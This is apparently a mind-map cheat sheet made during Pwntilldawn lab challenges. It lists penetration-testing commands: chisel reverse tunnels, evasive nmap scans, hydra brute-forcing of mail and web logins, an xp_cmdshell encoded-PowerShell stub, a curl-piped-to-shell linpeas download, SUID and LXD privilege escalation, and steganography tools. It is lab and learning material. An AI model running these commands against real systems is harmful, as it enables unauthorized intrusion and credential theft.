Kategorier: Alla - web

av Anthony Guilbert för 3 dagar sedan

252

Pwntilldawn Mindmap FULL

The information provides a detailed overview of various techniques and tools used in cybersecurity, focusing on network scanning, steganography, pivoting and tunneling, privilege escalation, and web filtering.

Pwntilldawn Mindmap FULL

Pwntilldawn FULL

Mindmap I did while doing some Pwntilldawn boxes

Pivoting / Tunneling

Tunneling & Port Forwarding
Si on a un acces SSH

sshuttle -r user@ip -N

Web en écoute sur localhost

Sur la victime

./chisel client ip_host:7777 R:8080:127.0.0.1:8080

Ne pas oublier d'adapter le port 8080 selon les situations



Sur l'host

chisel server -port 7777 --reverse

Subtopic

Verifier ce qui écoute sur localhost

NMAP

Nmap Automator
nmap -sV -sC -T5 -p- ip
IDS/Firewalls
ncat -nv --source-port 53 10.129.2.28 50000
nmap -sS -Pn -n -p- --disable-arp-ping -D RND:3 --source-port 53 ip
nmap -sSU --script dns-nsid ip

Protocoles divers

DNS
! AXFR !

dig @mortysserver.com mortysserver.com axfr

Ajout dans /etc/hosts si besoin

Exemple : 10.150.150.57 rickscontrolpanel.mortysserver.com

SSH
Test de se co pour la bannière
Connexion si on a la clé privée

ssh -i id_rsa user@ip

POP3
hydra -l operator -P wordlist.txt ip pop3
MSSQL
EXEC xp_cmdshell 'powershell -encodedcommand ';

setup un listener avant

mssqlclient.py sequel.htb/sa:MSSQLP@ssw0rd!@10.10.11.51
Mysql
mysql -h localhost -u sql_user -p
mysqldump -u root -p --all-databases > alldb.sql
FTP
Login anon à vérif
NFS
showmount -e IP
sudo mount -t nfs ip:/remote /local
sudo umount 10.150.150.59:/nfsroot
rpcinfo IP
SMTP
hydra -l operator -P wordlist.txt ipip smtp
smtp-user-enum -U /usr/share/wordlists/metasploit/unix_users.txt 10.150.150.17 25

Misc

netstat -antup
Dumb shell upgrade
python3 -c 'import pty; pty.spawn("/bin/bash")'
script /dev/null -qc /bin/bash

Transfer files - windows

target (windows)
Invoke-WebRequest -Uri http://10.10.16.35:7676/SharpGPOAbuse.exe -OutFile SharpGPOAbuse.exe
host (linux)
python3 -m http.server port

Find files

Hidden deleted file

Download file

Copy-Item 'C:\$RECYCLE.BIN\S-1-5-21-2386970044-1145388522-2932701813-1103\$RE2XMEG.7z' -Destination 'C:\Users\f.frizzle\Desktop\\wapt-backup-sunday.7z'

Find file

(New-Object -ComObject Shell.Application).Namespace(0xA).Items() | ForEach-Object { "$($_.Name) - $($_.Path)" }

tree /a /f
@for /r C:\ %i in (FLAG??.txt) do @echo %i && @type "%i"
Linux
Other

grep -r pattern

search in files ( -recursive )

Find

find / -type f -name 'FLAG[0-9][0-9]' 2>/dev/null

find ./* | grep FLAG3

find / \( -name ".env" -o -name ".git" \) 2>/dev/null

find / -type f -name 'FLAG[0-9].txt' 2>/dev/null

Privesc

Python Library Hijacking
Script qui tourne en root avec des imports de librairies
Metasploit
Upgrade session : sessions -u
Linux
LXC/LXD

https://book.hacktricks.xyz/linux-hardening/privilege-escalation/interesting-groups-linux-pe/lxd-privilege-escalation

SUID

find / -perm -u=s -type f 2>/dev/null

Lien symbolique

ln -s /root /home/michael/importantfiles/rootbackup

searchsploit

searchsploit -m chemin

searchsploit xxxx

linpeas

curl -L https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh | sh

Windows
winpeas
msfconsole

multi/recon/localexploitsuggester

WEB

Wordpress
Bruteforce

wpscan --url url_wordpress --passwords wordlist

Enumération users

wpscan --url url --enumerate u

wpscan --url https://www.hackinprovence.fr/ -e u
Check template et plugins vulnérables

wpscan --url url --enumerate vp,vt

PHP Filters
python3 script.py --chain ''

https://github.com/synacktiv/phpfilterchaingenerator/blob/main/phpfilterchaingenerator.py

Enumération
Path

Dirsearch

FeroxBuster

feroxbuster -u url -w ~/Desktop/SecLists-master/Discovery/Web-Content/common.txt --filter-status 404

feroxbuster -u http://example.com -w wordlist -x php,html,txt -v -o output.txt --filter-status 404

-k pour certif autosigné

Bruteforce Forms
Hydra

hydra -l admin -P SecLists-master/rockyou.txt 10.150.150.38 -s 30609 -t 20 http-post-form "/jacegisecurity_check:jusername=^USER^&jpassword=^PASS^&from=%2F&Submit=Sign+in:Invalid username or password"

hydra -l operator -P wordlist.txt 10.150.150.56

Stegano

searchsploit
searchsploit -m xxxxx
Depixelise
Unredactor
Depix

python3 depix.py -p pixel_image -s images/searchimages/image.png

Stereogram
https://piellardj.github.io/stereogram-solver/
Aperisolve
Steghide
steghide extract -sf screen.jpeg